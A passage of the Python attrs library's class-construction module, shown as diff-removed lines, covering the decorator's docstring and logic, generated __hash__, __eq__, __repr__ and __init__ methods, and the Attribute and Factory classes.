*attrs* will - *not* remove existing implementations of ``__hash__`` or the equality - methods. It just won't add own ones.), - - all attributes that are either passed into ``__init__`` or have a - default value are additionally available as a tuple in the ``args`` - attribute, - - the value of *str* is ignored leaving ``__str__`` to base classes. - :param bool collect_by_mro: Setting this to `True` fixes the way *attrs* - collects attributes from base classes. The default behavior is - incorrect in certain cases of multiple inheritance. It should be on by - default but is kept off for backward-compatibility. - - See issue `#428 `_ for - more details. - - :param Optional[bool] getstate_setstate: - .. note:: - This is usually only interesting for slotted classes and you should - probably just set *auto_detect* to `True`. - - If `True`, ``__getstate__`` and - ``__setstate__`` are generated and attached to the class. This is - necessary for slotted classes to be pickleable. If left `None`, it's - `True` by default for slotted classes and ``False`` for dict classes. - - If *auto_detect* is `True`, and *getstate_setstate* is left `None`, - and **either** ``__getstate__`` or ``__setstate__`` is detected directly - on the class (i.e. not inherited), it is set to `False` (this is usually - what you want). - - :param on_setattr: A callable that is run whenever the user attempts to set - an attribute (either by assignment like ``i.x = 42`` or by using - `setattr` like ``setattr(i, "x", 42)``). It receives the same arguments - as validators: the instance, the attribute that is being modified, and - the new value. - - If no exception is raised, the attribute is set to the return value of - the callable. - - If a list of callables is passed, they're automatically wrapped in an - `attrs.setters.pipe`. - :type on_setattr: `callable`, or a list of callables, or `None`, or - `attrs.setters.NO_OP` - - :param Optional[callable] field_transformer: - A function that is called with the original class object and all - fields right before *attrs* finalizes the class. You can use - this, e.g., to automatically add converters or validators to - fields based on their types. See `transform-fields` for more details. - - :param bool match_args: - If `True` (default), set ``__match_args__`` on the class to support - :pep:`634` (Structural Pattern Matching). It is a tuple of all - non-keyword-only ``__init__`` parameter names on Python 3.10 and later. - Ignored on older Python versions. - - .. versionadded:: 16.0.0 *slots* - .. versionadded:: 16.1.0 *frozen* - .. versionadded:: 16.3.0 *str* - .. versionadded:: 16.3.0 Support for ``__attrs_post_init__``. - .. versionchanged:: 17.1.0 - *hash* supports ``None`` as value which is also the default now. - .. versionadded:: 17.3.0 *auto_attribs* - .. versionchanged:: 18.1.0 - If *these* is passed, no attributes are deleted from the class body. - .. versionchanged:: 18.1.0 If *these* is ordered, the order is retained. - .. versionadded:: 18.2.0 *weakref_slot* - .. deprecated:: 18.2.0 - ``__lt__``, ``__le__``, ``__gt__``, and ``__ge__`` now raise a - `DeprecationWarning` if the classes compared are subclasses of - each other. ``__eq`` and ``__ne__`` never tried to compared subclasses - to each other. - .. versionchanged:: 19.2.0 - ``__lt__``, ``__le__``, ``__gt__``, and ``__ge__`` now do not consider - subclasses comparable anymore. - .. versionadded:: 18.2.0 *kw_only* - .. versionadded:: 18.2.0 *cache_hash* - .. versionadded:: 19.1.0 *auto_exc* - .. 
deprecated:: 19.2.0 *cmp* Removal on or after 2021-06-01. - .. versionadded:: 19.2.0 *eq* and *order* - .. versionadded:: 20.1.0 *auto_detect* - .. versionadded:: 20.1.0 *collect_by_mro* - .. versionadded:: 20.1.0 *getstate_setstate* - .. versionadded:: 20.1.0 *on_setattr* - .. versionadded:: 20.3.0 *field_transformer* - .. versionchanged:: 21.1.0 - ``init=False`` injects ``__attrs_init__`` - .. versionchanged:: 21.1.0 Support for ``__attrs_pre_init__`` - .. versionchanged:: 21.1.0 *cmp* undeprecated - .. versionadded:: 21.3.0 *match_args* - .. versionadded:: 22.2.0 - *unsafe_hash* as an alias for *hash* (for :pep:`681` compliance). - """ - eq_, order_ = _determine_attrs_eq_order(cmp, eq, order, None) - - # unsafe_hash takes precedence due to PEP 681. - if unsafe_hash is not None: - hash = unsafe_hash - - if isinstance(on_setattr, (list, tuple)): - on_setattr = setters.pipe(*on_setattr) - - def wrap(cls): - is_frozen = frozen or _has_frozen_base_class(cls) - is_exc = auto_exc is True and issubclass(cls, BaseException) - has_own_setattr = auto_detect and _has_own_attribute( - cls, "__setattr__" - ) - - if has_own_setattr and is_frozen: - raise ValueError("Can't freeze a class with a custom __setattr__.") - - builder = _ClassBuilder( - cls, - these, - slots, - is_frozen, - weakref_slot, - _determine_whether_to_implement( - cls, - getstate_setstate, - auto_detect, - ("__getstate__", "__setstate__"), - default=slots, - ), - auto_attribs, - kw_only, - cache_hash, - is_exc, - collect_by_mro, - on_setattr, - has_own_setattr, - field_transformer, - ) - if _determine_whether_to_implement( - cls, repr, auto_detect, ("__repr__",) - ): - builder.add_repr(repr_ns) - if str is True: - builder.add_str() - - eq = _determine_whether_to_implement( - cls, eq_, auto_detect, ("__eq__", "__ne__") - ) - if not is_exc and eq is True: - builder.add_eq() - if not is_exc and _determine_whether_to_implement( - cls, order_, auto_detect, ("__lt__", "__le__", "__gt__", "__ge__") - ): - builder.add_order() - - builder.add_setattr() - - nonlocal hash - if ( - hash is None - and auto_detect is True - and _has_own_attribute(cls, "__hash__") - ): - hash = False - - if hash is not True and hash is not False and hash is not None: - # Can't use `hash in` because 1 == True for example. - raise TypeError( - "Invalid value for hash. Must be True, False, or None." - ) - elif hash is False or (hash is None and eq is False) or is_exc: - # Don't do anything. Should fall back to __object__'s __hash__ - # which is by id. - if cache_hash: - raise TypeError( - "Invalid value for cache_hash. To use hash caching," - " hashing must be either explicitly or implicitly " - "enabled." - ) - elif hash is True or ( - hash is None and eq is True and is_frozen is True - ): - # Build a __hash__ if told so, or if it's safe. - builder.add_hash() - else: - # Raise TypeError on attempts to hash. - if cache_hash: - raise TypeError( - "Invalid value for cache_hash. To use hash caching," - " hashing must be either explicitly or implicitly " - "enabled." - ) - builder.make_unhashable() - - if _determine_whether_to_implement( - cls, init, auto_detect, ("__init__",) - ): - builder.add_init() - else: - builder.add_attrs_init() - if cache_hash: - raise TypeError( - "Invalid value for cache_hash. To use hash caching," - " init must be True." - ) - - if ( - PY310 - and match_args - and not _has_own_attribute(cls, "__match_args__") - ): - builder.add_match_args() - - return builder.build_class() - - # maybe_cls's type depends on the usage of the decorator. 
It's a class - # if it's used as `@attrs` but ``None`` if used as `@attrs()`. - if maybe_cls is None: - return wrap - else: - return wrap(maybe_cls) - - -_attrs = attrs -""" -Internal alias so we can use it in functions that take an argument called -*attrs*. -""" - - -def _has_frozen_base_class(cls): - """ - Check whether *cls* has a frozen ancestor by looking at its - __setattr__. - """ - return cls.__setattr__ is _frozen_setattrs - - -def _generate_unique_filename(cls, func_name): - """ - Create a "filename" suitable for a function being generated. - """ - return ( - f"" - ) - - -def _make_hash(cls, attrs, frozen, cache_hash): - attrs = tuple( - a for a in attrs if a.hash is True or (a.hash is None and a.eq is True) - ) - - tab = " " - - unique_filename = _generate_unique_filename(cls, "hash") - type_hash = hash(unique_filename) - # If eq is custom generated, we need to include the functions in globs - globs = {} - - hash_def = "def __hash__(self" - hash_func = "hash((" - closing_braces = "))" - if not cache_hash: - hash_def += "):" - else: - hash_def += ", *" - - hash_def += ( - ", _cache_wrapper=" - + "__import__('attr._make')._make._CacheHashWrapper):" - ) - hash_func = "_cache_wrapper(" + hash_func - closing_braces += ")" - - method_lines = [hash_def] - - def append_hash_computation_lines(prefix, indent): - """ - Generate the code for actually computing the hash code. - Below this will either be returned directly or used to compute - a value which is then cached, depending on the value of cache_hash - """ - - method_lines.extend( - [ - indent + prefix + hash_func, - indent + f" {type_hash},", - ] - ) - - for a in attrs: - if a.eq_key: - cmp_name = f"_{a.name}_key" - globs[cmp_name] = a.eq_key - method_lines.append( - indent + f" {cmp_name}(self.{a.name})," - ) - else: - method_lines.append(indent + f" self.{a.name},") - - method_lines.append(indent + " " + closing_braces) - - if cache_hash: - method_lines.append(tab + f"if self.{_hash_cache_field} is None:") - if frozen: - append_hash_computation_lines( - f"object.__setattr__(self, '{_hash_cache_field}', ", tab * 2 - ) - method_lines.append(tab * 2 + ")") # close __setattr__ - else: - append_hash_computation_lines( - f"self.{_hash_cache_field} = ", tab * 2 - ) - method_lines.append(tab + f"return self.{_hash_cache_field}") - else: - append_hash_computation_lines("return ", tab) - - script = "\n".join(method_lines) - return _make_method("__hash__", script, unique_filename, globs) - - -def _add_hash(cls, attrs): - """ - Add a hash method to *cls*. - """ - cls.__hash__ = _make_hash(cls, attrs, frozen=False, cache_hash=False) - return cls - - -def _make_ne(): - """ - Create __ne__ method. - """ - - def __ne__(self, other): - """ - Check equality and either forward a NotImplemented or - return the result negated. - """ - result = self.__eq__(other) - if result is NotImplemented: - return NotImplemented - - return not result - - return __ne__ - - -def _make_eq(cls, attrs): - """ - Create __eq__ method for *cls* with *attrs*. - """ - attrs = [a for a in attrs if a.eq] - - unique_filename = _generate_unique_filename(cls, "eq") - lines = [ - "def __eq__(self, other):", - " if other.__class__ is not self.__class__:", - " return NotImplemented", - ] - - # We can't just do a big self.x = other.x and... clause due to - # irregularities like nan == nan is false but (nan,) == (nan,) is true. 
- globs = {} - if attrs: - lines.append(" return (") - others = [" ) == ("] - for a in attrs: - if a.eq_key: - cmp_name = f"_{a.name}_key" - # Add the key function to the global namespace - # of the evaluated function. - globs[cmp_name] = a.eq_key - lines.append(f" {cmp_name}(self.{a.name}),") - others.append(f" {cmp_name}(other.{a.name}),") - else: - lines.append(f" self.{a.name},") - others.append(f" other.{a.name},") - - lines += others + [" )"] - else: - lines.append(" return True") - - script = "\n".join(lines) - - return _make_method("__eq__", script, unique_filename, globs) - - -def _make_order(cls, attrs): - """ - Create ordering methods for *cls* with *attrs*. - """ - attrs = [a for a in attrs if a.order] - - def attrs_to_tuple(obj): - """ - Save us some typing. - """ - return tuple( - key(value) if key else value - for value, key in ( - (getattr(obj, a.name), a.order_key) for a in attrs - ) - ) - - def __lt__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) < attrs_to_tuple(other) - - return NotImplemented - - def __le__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) <= attrs_to_tuple(other) - - return NotImplemented - - def __gt__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) > attrs_to_tuple(other) - - return NotImplemented - - def __ge__(self, other): - """ - Automatically created by attrs. - """ - if other.__class__ is self.__class__: - return attrs_to_tuple(self) >= attrs_to_tuple(other) - - return NotImplemented - - return __lt__, __le__, __gt__, __ge__ - - -def _add_eq(cls, attrs=None): - """ - Add equality methods to *cls* with *attrs*. - """ - if attrs is None: - attrs = cls.__attrs_attrs__ - - cls.__eq__ = _make_eq(cls, attrs) - cls.__ne__ = _make_ne() - - return cls - - -def _make_repr(attrs, ns, cls): - unique_filename = _generate_unique_filename(cls, "repr") - # Figure out which attributes to include, and which function to use to - # format them. The a.repr value can be either bool or a custom - # callable. - attr_names_with_reprs = tuple( - (a.name, (repr if a.repr is True else a.repr), a.init) - for a in attrs - if a.repr is not False - ) - globs = { - name + "_repr": r for name, r, _ in attr_names_with_reprs if r != repr - } - globs["_compat"] = _compat - globs["AttributeError"] = AttributeError - globs["NOTHING"] = NOTHING - attribute_fragments = [] - for name, r, i in attr_names_with_reprs: - accessor = ( - "self." 
+ name if i else 'getattr(self, "' + name + '", NOTHING)' - ) - fragment = ( - "%s={%s!r}" % (name, accessor) - if r == repr - else "%s={%s_repr(%s)}" % (name, name, accessor) - ) - attribute_fragments.append(fragment) - repr_fragment = ", ".join(attribute_fragments) - - if ns is None: - cls_name_fragment = '{self.__class__.__qualname__.rsplit(">.", 1)[-1]}' - else: - cls_name_fragment = ns + ".{self.__class__.__name__}" - - lines = [ - "def __repr__(self):", - " try:", - " already_repring = _compat.repr_context.already_repring", - " except AttributeError:", - " already_repring = {id(self),}", - " _compat.repr_context.already_repring = already_repring", - " else:", - " if id(self) in already_repring:", - " return '...'", - " else:", - " already_repring.add(id(self))", - " try:", - f" return f'{cls_name_fragment}({repr_fragment})'", - " finally:", - " already_repring.remove(id(self))", - ] - - return _make_method( - "__repr__", "\n".join(lines), unique_filename, globs=globs - ) - - -def _add_repr(cls, ns=None, attrs=None): - """ - Add a repr method to *cls*. - """ - if attrs is None: - attrs = cls.__attrs_attrs__ - - cls.__repr__ = _make_repr(attrs, ns, cls) - return cls - - -def fields(cls): - """ - Return the tuple of *attrs* attributes for a class. - - The tuple also allows accessing the fields by their names (see below for - examples). - - :param type cls: Class to introspect. - - :raise TypeError: If *cls* is not a class. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - :rtype: tuple (with name accessors) of `attrs.Attribute` - - .. versionchanged:: 16.2.0 Returned tuple allows accessing the fields - by name. - .. versionchanged:: 23.1.0 Add support for generic classes. - """ - generic_base = get_generic_base(cls) - - if generic_base is None and not isinstance(cls, type): - raise TypeError("Passed object must be a class.") - - attrs = getattr(cls, "__attrs_attrs__", None) - - if attrs is None: - if generic_base is not None: - attrs = getattr(generic_base, "__attrs_attrs__", None) - if attrs is not None: - # Even though this is global state, stick it on here to speed - # it up. We rely on `cls` being cached for this to be - # efficient. - cls.__attrs_attrs__ = attrs - return attrs - raise NotAnAttrsClassError(f"{cls!r} is not an attrs-decorated class.") - - return attrs - - -def fields_dict(cls): - """ - Return an ordered dictionary of *attrs* attributes for a class, whose - keys are the attribute names. - - :param type cls: Class to introspect. - - :raise TypeError: If *cls* is not a class. - :raise attrs.exceptions.NotAnAttrsClassError: If *cls* is not an *attrs* - class. - - :rtype: dict - - .. versionadded:: 18.1.0 - """ - if not isinstance(cls, type): - raise TypeError("Passed object must be a class.") - attrs = getattr(cls, "__attrs_attrs__", None) - if attrs is None: - raise NotAnAttrsClassError(f"{cls!r} is not an attrs-decorated class.") - return {a.name: a for a in attrs} - - -def validate(inst): - """ - Validate all attributes on *inst* that have a validator. - - Leaves all exceptions through. - - :param inst: Instance of a class with *attrs* attributes. - """ - if _config._run_validators is False: - return - - for a in fields(inst.__class__): - v = a.validator - if v is not None: - v(inst, a, getattr(inst, a.name)) - - -def _is_slot_cls(cls): - return "__slots__" in cls.__dict__ - - -def _is_slot_attr(a_name, base_attr_map): - """ - Check if the attribute name comes from a slot class. 
- """ - return a_name in base_attr_map and _is_slot_cls(base_attr_map[a_name]) - - -def _make_init( - cls, - attrs, - pre_init, - post_init, - frozen, - slots, - cache_hash, - base_attr_map, - is_exc, - cls_on_setattr, - attrs_init, -): - has_cls_on_setattr = ( - cls_on_setattr is not None and cls_on_setattr is not setters.NO_OP - ) - - if frozen and has_cls_on_setattr: - raise ValueError("Frozen classes can't use on_setattr.") - - needs_cached_setattr = cache_hash or frozen - filtered_attrs = [] - attr_dict = {} - for a in attrs: - if not a.init and a.default is NOTHING: - continue - - filtered_attrs.append(a) - attr_dict[a.name] = a - - if a.on_setattr is not None: - if frozen is True: - raise ValueError("Frozen classes can't use on_setattr.") - - needs_cached_setattr = True - elif has_cls_on_setattr and a.on_setattr is not setters.NO_OP: - needs_cached_setattr = True - - unique_filename = _generate_unique_filename(cls, "init") - - script, globs, annotations = _attrs_to_init_script( - filtered_attrs, - frozen, - slots, - pre_init, - post_init, - cache_hash, - base_attr_map, - is_exc, - needs_cached_setattr, - has_cls_on_setattr, - attrs_init, - ) - if cls.__module__ in sys.modules: - # This makes typing.get_type_hints(CLS.__init__) resolve string types. - globs.update(sys.modules[cls.__module__].__dict__) - - globs.update({"NOTHING": NOTHING, "attr_dict": attr_dict}) - - if needs_cached_setattr: - # Save the lookup overhead in __init__ if we need to circumvent - # setattr hooks. - globs["_cached_setattr_get"] = _obj_setattr.__get__ - - init = _make_method( - "__attrs_init__" if attrs_init else "__init__", - script, - unique_filename, - globs, - ) - init.__annotations__ = annotations - - return init - - -def _setattr(attr_name, value_var, has_on_setattr): - """ - Use the cached object.setattr to set *attr_name* to *value_var*. - """ - return f"_setattr('{attr_name}', {value_var})" - - -def _setattr_with_converter(attr_name, value_var, has_on_setattr): - """ - Use the cached object.setattr to set *attr_name* to *value_var*, but run - its converter first. - """ - return "_setattr('%s', %s(%s))" % ( - attr_name, - _init_converter_pat % (attr_name,), - value_var, - ) - - -def _assign(attr_name, value, has_on_setattr): - """ - Unless *attr_name* has an on_setattr hook, use normal assignment. Otherwise - relegate to _setattr. - """ - if has_on_setattr: - return _setattr(attr_name, value, True) - - return f"self.{attr_name} = {value}" - - -def _assign_with_converter(attr_name, value_var, has_on_setattr): - """ - Unless *attr_name* has an on_setattr hook, use normal assignment after - conversion. Otherwise relegate to _setattr_with_converter. - """ - if has_on_setattr: - return _setattr_with_converter(attr_name, value_var, True) - - return "self.%s = %s(%s)" % ( - attr_name, - _init_converter_pat % (attr_name,), - value_var, - ) - - -def _attrs_to_init_script( - attrs, - frozen, - slots, - pre_init, - post_init, - cache_hash, - base_attr_map, - is_exc, - needs_cached_setattr, - has_cls_on_setattr, - attrs_init, -): - """ - Return a script of an initializer for *attrs* and a dict of globals. - - The globals are expected by the generated script. - - If *frozen* is True, we cannot set the attributes directly so we use - a cached ``object.__setattr__``. - """ - lines = [] - if pre_init: - lines.append("self.__attrs_pre_init__()") - - if needs_cached_setattr: - lines.append( - # Circumvent the __setattr__ descriptor to save one lookup per - # assignment. 
- # Note _setattr will be used again below if cache_hash is True - "_setattr = _cached_setattr_get(self)" - ) - - if frozen is True: - if slots is True: - fmt_setter = _setattr - fmt_setter_with_converter = _setattr_with_converter - else: - # Dict frozen classes assign directly to __dict__. - # But only if the attribute doesn't come from an ancestor slot - # class. - # Note _inst_dict will be used again below if cache_hash is True - lines.append("_inst_dict = self.__dict__") - - def fmt_setter(attr_name, value_var, has_on_setattr): - if _is_slot_attr(attr_name, base_attr_map): - return _setattr(attr_name, value_var, has_on_setattr) - - return f"_inst_dict['{attr_name}'] = {value_var}" - - def fmt_setter_with_converter( - attr_name, value_var, has_on_setattr - ): - if has_on_setattr or _is_slot_attr(attr_name, base_attr_map): - return _setattr_with_converter( - attr_name, value_var, has_on_setattr - ) - - return "_inst_dict['%s'] = %s(%s)" % ( - attr_name, - _init_converter_pat % (attr_name,), - value_var, - ) - - else: - # Not frozen. - fmt_setter = _assign - fmt_setter_with_converter = _assign_with_converter - - args = [] - kw_only_args = [] - attrs_to_validate = [] - - # This is a dictionary of names to validator and converter callables. - # Injecting this into __init__ globals lets us avoid lookups. - names_for_globals = {} - annotations = {"return": None} - - for a in attrs: - if a.validator: - attrs_to_validate.append(a) - - attr_name = a.name - has_on_setattr = a.on_setattr is not None or ( - a.on_setattr is not setters.NO_OP and has_cls_on_setattr - ) - # a.alias is set to maybe-mangled attr_name in _ClassBuilder if not - # explicitly provided - arg_name = a.alias - - has_factory = isinstance(a.default, Factory) - if has_factory and a.default.takes_self: - maybe_self = "self" - else: - maybe_self = "" - - if a.init is False: - if has_factory: - init_factory_name = _init_factory_pat % (a.name,) - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, - init_factory_name + f"({maybe_self})", - has_on_setattr, - ) - ) - conv_name = _init_converter_pat % (a.name,) - names_for_globals[conv_name] = a.converter - else: - lines.append( - fmt_setter( - attr_name, - init_factory_name + f"({maybe_self})", - has_on_setattr, - ) - ) - names_for_globals[init_factory_name] = a.default.factory - else: - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, - f"attr_dict['{attr_name}'].default", - has_on_setattr, - ) - ) - conv_name = _init_converter_pat % (a.name,) - names_for_globals[conv_name] = a.converter - else: - lines.append( - fmt_setter( - attr_name, - f"attr_dict['{attr_name}'].default", - has_on_setattr, - ) - ) - elif a.default is not NOTHING and not has_factory: - arg = f"{arg_name}=attr_dict['{attr_name}'].default" - if a.kw_only: - kw_only_args.append(arg) - else: - args.append(arg) - - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, arg_name, has_on_setattr - ) - ) - names_for_globals[ - _init_converter_pat % (a.name,) - ] = a.converter - else: - lines.append(fmt_setter(attr_name, arg_name, has_on_setattr)) - - elif has_factory: - arg = f"{arg_name}=NOTHING" - if a.kw_only: - kw_only_args.append(arg) - else: - args.append(arg) - lines.append(f"if {arg_name} is not NOTHING:") - - init_factory_name = _init_factory_pat % (a.name,) - if a.converter is not None: - lines.append( - " " - + fmt_setter_with_converter( - attr_name, arg_name, has_on_setattr - ) - ) - lines.append("else:") - 
lines.append( - " " - + fmt_setter_with_converter( - attr_name, - init_factory_name + "(" + maybe_self + ")", - has_on_setattr, - ) - ) - names_for_globals[ - _init_converter_pat % (a.name,) - ] = a.converter - else: - lines.append( - " " + fmt_setter(attr_name, arg_name, has_on_setattr) - ) - lines.append("else:") - lines.append( - " " - + fmt_setter( - attr_name, - init_factory_name + "(" + maybe_self + ")", - has_on_setattr, - ) - ) - names_for_globals[init_factory_name] = a.default.factory - else: - if a.kw_only: - kw_only_args.append(arg_name) - else: - args.append(arg_name) - - if a.converter is not None: - lines.append( - fmt_setter_with_converter( - attr_name, arg_name, has_on_setattr - ) - ) - names_for_globals[ - _init_converter_pat % (a.name,) - ] = a.converter - else: - lines.append(fmt_setter(attr_name, arg_name, has_on_setattr)) - - if a.init is True: - if a.type is not None and a.converter is None: - annotations[arg_name] = a.type - elif a.converter is not None: - # Try to get the type from the converter. - t = _AnnotationExtractor(a.converter).get_first_param_type() - if t: - annotations[arg_name] = t - - if attrs_to_validate: # we can skip this if there are no validators. - names_for_globals["_config"] = _config - lines.append("if _config._run_validators is True:") - for a in attrs_to_validate: - val_name = "__attr_validator_" + a.name - attr_name = "__attr_" + a.name - lines.append(f" {val_name}(self, {attr_name}, self.{a.name})") - names_for_globals[val_name] = a.validator - names_for_globals[attr_name] = a - - if post_init: - lines.append("self.__attrs_post_init__()") - - # because this is set only after __attrs_post_init__ is called, a crash - # will result if post-init tries to access the hash code. This seemed - # preferable to setting this beforehand, in which case alteration to - # field values during post-init combined with post-init accessing the - # hash code would result in silent bugs. - if cache_hash: - if frozen: - if slots: - # if frozen and slots, then _setattr defined above - init_hash_cache = "_setattr('%s', %s)" - else: - # if frozen and not slots, then _inst_dict defined above - init_hash_cache = "_inst_dict['%s'] = %s" - else: - init_hash_cache = "self.%s = %s" - lines.append(init_hash_cache % (_hash_cache_field, "None")) - - # For exceptions we rely on BaseException.__init__ for proper - # initialization. - if is_exc: - vals = ",".join(f"self.{a.name}" for a in attrs if a.init) - - lines.append(f"BaseException.__init__(self, {vals})") - - args = ", ".join(args) - if kw_only_args: - args += "%s*, %s" % ( - ", " if args else "", # leading comma - ", ".join(kw_only_args), # kw_only args - ) - - return ( - "def %s(self, %s):\n %s\n" - % ( - ("__attrs_init__" if attrs_init else "__init__"), - args, - "\n ".join(lines) if lines else "pass", - ), - names_for_globals, - annotations, - ) - - -def _default_init_alias_for(name: str) -> str: - """ - The default __init__ parameter name for a field. - - This performs private-name adjustment via leading-unscore stripping, - and is the default value of Attribute.alias if not provided. - """ - - return name.lstrip("_") - - -class Attribute: - """ - *Read-only* representation of an attribute. - - .. warning:: - - You should never instantiate this class yourself. - - The class has *all* arguments of `attr.ib` (except for ``factory`` - which is only syntactic sugar for ``default=Factory(...)`` plus the - following: - - - ``name`` (`str`): The name of the attribute. 
- - ``alias`` (`str`): The __init__ parameter name of the attribute, after - any explicit overrides and default private-attribute-name handling. - - ``inherited`` (`bool`): Whether or not that attribute has been inherited - from a base class. - - ``eq_key`` and ``order_key`` (`typing.Callable` or `None`): The callables - that are used for comparing and ordering objects by this attribute, - respectively. These are set by passing a callable to `attr.ib`'s ``eq``, - ``order``, or ``cmp`` arguments. See also :ref:`comparison customization - `. - - Instances of this class are frequently used for introspection purposes - like: - - - `fields` returns a tuple of them. - - Validators get them passed as the first argument. - - The :ref:`field transformer ` hook receives a list of - them. - - The ``alias`` property exposes the __init__ parameter name of the field, - with any overrides and default private-attribute handling applied. - - - .. versionadded:: 20.1.0 *inherited* - .. versionadded:: 20.1.0 *on_setattr* - .. versionchanged:: 20.2.0 *inherited* is not taken into account for - equality checks and hashing anymore. - .. versionadded:: 21.1.0 *eq_key* and *order_key* - .. versionadded:: 22.2.0 *alias* - - For the full version history of the fields, see `attr.ib`. - """ - - __slots__ = ( - "name", - "default", - "validator", - "repr", - "eq", - "eq_key", - "order", - "order_key", - "hash", - "init", - "metadata", - "type", - "converter", - "kw_only", - "inherited", - "on_setattr", - "alias", - ) - - def __init__( - self, - name, - default, - validator, - repr, - cmp, # XXX: unused, remove along with other cmp code. - hash, - init, - inherited, - metadata=None, - type=None, - converter=None, - kw_only=False, - eq=None, - eq_key=None, - order=None, - order_key=None, - on_setattr=None, - alias=None, - ): - eq, eq_key, order, order_key = _determine_attrib_eq_order( - cmp, eq_key or eq, order_key or order, True - ) - - # Cache this descriptor here to speed things up later. - bound_setattr = _obj_setattr.__get__(self) - - # Despite the big red warning, people *do* instantiate `Attribute` - # themselves. - bound_setattr("name", name) - bound_setattr("default", default) - bound_setattr("validator", validator) - bound_setattr("repr", repr) - bound_setattr("eq", eq) - bound_setattr("eq_key", eq_key) - bound_setattr("order", order) - bound_setattr("order_key", order_key) - bound_setattr("hash", hash) - bound_setattr("init", init) - bound_setattr("converter", converter) - bound_setattr( - "metadata", - ( - types.MappingProxyType(dict(metadata)) # Shallow copy - if metadata - else _empty_metadata_singleton - ), - ) - bound_setattr("type", type) - bound_setattr("kw_only", kw_only) - bound_setattr("inherited", inherited) - bound_setattr("on_setattr", on_setattr) - bound_setattr("alias", alias) - - def __setattr__(self, name, value): - raise FrozenInstanceError() - - @classmethod - def from_counting_attr(cls, name, ca, type=None): - # type holds the annotated value. 
deal with conflicts: - if type is None: - type = ca.type - elif ca.type is not None: - raise ValueError( - "Type annotation and type argument cannot both be present" - ) - inst_dict = { - k: getattr(ca, k) - for k in Attribute.__slots__ - if k - not in ( - "name", - "validator", - "default", - "type", - "inherited", - ) # exclude methods and deprecated alias - } - return cls( - name=name, - validator=ca._validator, - default=ca._default, - type=type, - cmp=None, - inherited=False, - **inst_dict, - ) - - # Don't use attrs.evolve since fields(Attribute) doesn't work - def evolve(self, **changes): - """ - Copy *self* and apply *changes*. - - This works similarly to `attrs.evolve` but that function does not work - with `Attribute`. - - It is mainly meant to be used for `transform-fields`. - - .. versionadded:: 20.3.0 - """ - new = copy.copy(self) - - new._setattrs(changes.items()) - - return new - - # Don't use _add_pickle since fields(Attribute) doesn't work - def __getstate__(self): - """ - Play nice with pickle. - """ - return tuple( - getattr(self, name) if name != "metadata" else dict(self.metadata) - for name in self.__slots__ - ) - - def __setstate__(self, state): - """ - Play nice with pickle. - """ - self._setattrs(zip(self.__slots__, state)) - - def _setattrs(self, name_values_pairs): - bound_setattr = _obj_setattr.__get__(self) - for name, value in name_values_pairs: - if name != "metadata": - bound_setattr(name, value) - else: - bound_setattr( - name, - types.MappingProxyType(dict(value)) - if value - else _empty_metadata_singleton, - ) - - -_a = [ - Attribute( - name=name, - default=NOTHING, - validator=None, - repr=True, - cmp=None, - eq=True, - order=False, - hash=(name != "metadata"), - init=True, - inherited=False, - alias=_default_init_alias_for(name), - ) - for name in Attribute.__slots__ -] - -Attribute = _add_hash( - _add_eq( - _add_repr(Attribute, attrs=_a), - attrs=[a for a in _a if a.name != "inherited"], - ), - attrs=[a for a in _a if a.hash and a.name != "inherited"], -) - - -class _CountingAttr: - """ - Intermediate representation of attributes that uses a counter to preserve - the order in which the attributes have been defined. - - *Internal* data structure of the attrs library. Running into is most - likely the result of a bug like a forgotten `@attr.s` decorator. 
- """ - - __slots__ = ( - "counter", - "_default", - "repr", - "eq", - "eq_key", - "order", - "order_key", - "hash", - "init", - "metadata", - "_validator", - "converter", - "type", - "kw_only", - "on_setattr", - "alias", - ) - __attrs_attrs__ = tuple( - Attribute( - name=name, - alias=_default_init_alias_for(name), - default=NOTHING, - validator=None, - repr=True, - cmp=None, - hash=True, - init=True, - kw_only=False, - eq=True, - eq_key=None, - order=False, - order_key=None, - inherited=False, - on_setattr=None, - ) - for name in ( - "counter", - "_default", - "repr", - "eq", - "order", - "hash", - "init", - "on_setattr", - "alias", - ) - ) + ( - Attribute( - name="metadata", - alias="metadata", - default=None, - validator=None, - repr=True, - cmp=None, - hash=False, - init=True, - kw_only=False, - eq=True, - eq_key=None, - order=False, - order_key=None, - inherited=False, - on_setattr=None, - ), - ) - cls_counter = 0 - - def __init__( - self, - default, - validator, - repr, - cmp, - hash, - init, - converter, - metadata, - type, - kw_only, - eq, - eq_key, - order, - order_key, - on_setattr, - alias, - ): - _CountingAttr.cls_counter += 1 - self.counter = _CountingAttr.cls_counter - self._default = default - self._validator = validator - self.converter = converter - self.repr = repr - self.eq = eq - self.eq_key = eq_key - self.order = order - self.order_key = order_key - self.hash = hash - self.init = init - self.metadata = metadata - self.type = type - self.kw_only = kw_only - self.on_setattr = on_setattr - self.alias = alias - - def validator(self, meth): - """ - Decorator that adds *meth* to the list of validators. - - Returns *meth* unchanged. - - .. versionadded:: 17.1.0 - """ - if self._validator is None: - self._validator = meth - else: - self._validator = and_(self._validator, meth) - return meth - - def default(self, meth): - """ - Decorator that allows to set the default for an attribute. - - Returns *meth* unchanged. - - :raises DefaultAlreadySetError: If default has been set before. - - .. versionadded:: 17.1.0 - """ - if self._default is not NOTHING: - raise DefaultAlreadySetError() - - self._default = Factory(meth, takes_self=True) - - return meth - - -_CountingAttr = _add_eq(_add_repr(_CountingAttr)) - - -class Factory: - """ - Stores a factory callable. - - If passed as the default value to `attrs.field`, the factory is used to - generate a new value. - - :param callable factory: A callable that takes either none or exactly one - mandatory positional argument depending on *takes_self*. - :param bool takes_self: Pass the partially initialized instance that is - being initialized as a positional argument. - - .. versionadded:: 17.1.0 *takes_self* - """ - - __slots__ = ("factory", "takes_self") - - def __init__(self, factory, takes_self=False): - self.factory = factory - self.takes_self = takes_self - - def __getstate__(self): - """ - Play nice with pickle. - """ - return tuple(getattr(self, name) for name in self.__slots__) - - def __setstate__(self, state): - """ - Play nice with pickle. 
